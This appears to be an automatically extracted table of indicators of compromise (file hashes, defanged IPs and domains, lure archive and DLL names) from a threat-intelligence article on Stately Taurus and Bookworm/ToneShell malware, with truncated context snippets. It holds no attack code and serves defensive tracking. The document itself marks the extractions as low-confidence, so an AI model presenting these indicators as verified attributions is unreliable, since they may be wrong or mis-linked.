| sha256 | 3cef0b5f069cc1d15d36aa83d54d2a7be79b29b02081b6592dd4714639ad0a66 | f1dbe6a82488db161a7f57cd74f2dd282a9522587f18313b4e9835dc558 3cef0b5f069cc1d15d36aa83d54d2a7be79b29b02081b6592dd4714639ad0a66 43de1831368e6420b90210e15f72cea9171478391e15efdd608ad22fe91 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 3e137da41cb509412ee230c6d7aac3d69361358b28c3a09ec851d3c0f3853326 | 456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4d2927 3e137da41cb509412ee230c6d7aac3d69361358b28c3a09ec851d3c0f3853326 fdad627a21a95ea2a6136c264c6a6cc2f0910a24881118b6eabc2d6509d | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 41276827827b95c9b5a9fbd198b7cff2aef6f90f2b2b3ea84fadb69c55efa171 | 8 analysis of the third meeting of ndsc.zip 123.253.32[.]15 41276827827b95c9b5a9fbd198b7cff2aef6f90f2b2b3ea84fadb69c55efa171 april 27 updated party list.zip 123.253.35[.]231 167a842b97 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 43de1831368e6420b90210e15f72cea9171478391e15efdd608ad22fe916cea8 | b5f069cc1d15d36aa83d54d2a7be79b29b02081b6592dd4714639ad0a66 43de1831368e6420b90210e15f72cea9171478391e15efdd608ad22fe916cea8 2bae8b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccd | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4a92fa725adc57d7b501f33e87230a8291cf8ad22d4d3a830293abcc0ac10d12 | 1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3b5e01 4a92fa725adc57d7b501f33e87230a8291cf8ad22d4d3a830293abcc0ac10d12 da8ef50fe5e571d0143a758c7c66bb55653f1f2d04f16464fc857226441 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4fbfbf1cd2efaef1906f0bd2195281b77619b9948e829b4d53bf1f198ba81dc5 | c6736e notice re uec, (04-25-2023 day).zip 123.253.35[.]231 4fbfbf1cd2efaef1906f0bd2195281b77619b9948e829b4d53bf1f198ba81dc5 biography of… | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d531ffa109dc4f842119b | sktop\uuid\uu\Release\uu.pdb www.fjke5oe[.]com Nov. 9, 2022 5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d531ffa109dc4f842119b ltdis13n.dll E:\WhiteFile\LTDIS13n\Release\LTDIS13n.pdb www | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 51bf329ba04a042789bad3b395092488a3d89130dc72818985cde11fb85f8389 | 9a82715b4d3b6c37c7e5be1b729cd8e6f01f feareade HTTP.dll 0x13 51bf329ba04a042789bad3b395092488a3d89130dc72818985cde11fb85f8389 fdafgravfdrafra WinINetwork.dll 0x17 Table 3. Contemporary | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 6804b10aefe8fdb2b33ecf3bc5a93f49413ef66001b561e6fc121990d703d780 | 0b36bbd128a71ddcd858b4b3c67ba78f516 Coder.dll Coder.dll 0xA 6804b10aefe8fdb2b33ecf3bc5a93f49413ef66001b561e6fc121990d703d780 999999.000 Digest.dll 0xB 72aa72a4a4bdb09146c587304c6639eae | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 72aa72a4a4bdb09146c587304c6639eae65900cb2ea26911540a77d1f9b7acf6 | 9413ef66001b561e6fc121990d703d780 999999.000 Digest.dll 0xB 72aa72a4a4bdb09146c587304c6639eae65900cb2ea26911540a77d1f9b7acf6 AES.dll AES.dll 0xC fb25a69ffc18b79ee664462e0717cf5e7082094 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 9192a1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3b5e01 | 2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b40110c66 9192a1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3b5e01 4a92fa725adc57d7b501f33e87230a8291cf8ad22d4d3a830293abcc0ac | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a0887fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f528ef2 | 2959cd9aa03482f3398fbe81b4874c50a5945fe6b0c0abb432a33db853f a0887fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f528ef2 a2452456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a08e0d1839b86d0d56a52d07123719211a3c3d43a6aa05aa34531a72ed1207dc | . This domain hosted the C2 server for a ToneShell sample ( a08e0d1839b86d0d56a52d07123719211a3c3d43a6aa05aa34531a72ed1207dc ) installed by Stately Taurus at the Southeast Asian govern | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a229a2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b40110c66 | b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccde7f89 a229a2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b40110c66 9192a1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a2452456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4d2927 | fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f528ef2 a2452456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4d2927 3e137da41cb509412ee230c6d7aac3d69361358b28c3a09ec851d3c0f38 | Stately Taurus Activity in Southeast Asia Links to Bookworm Malware Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.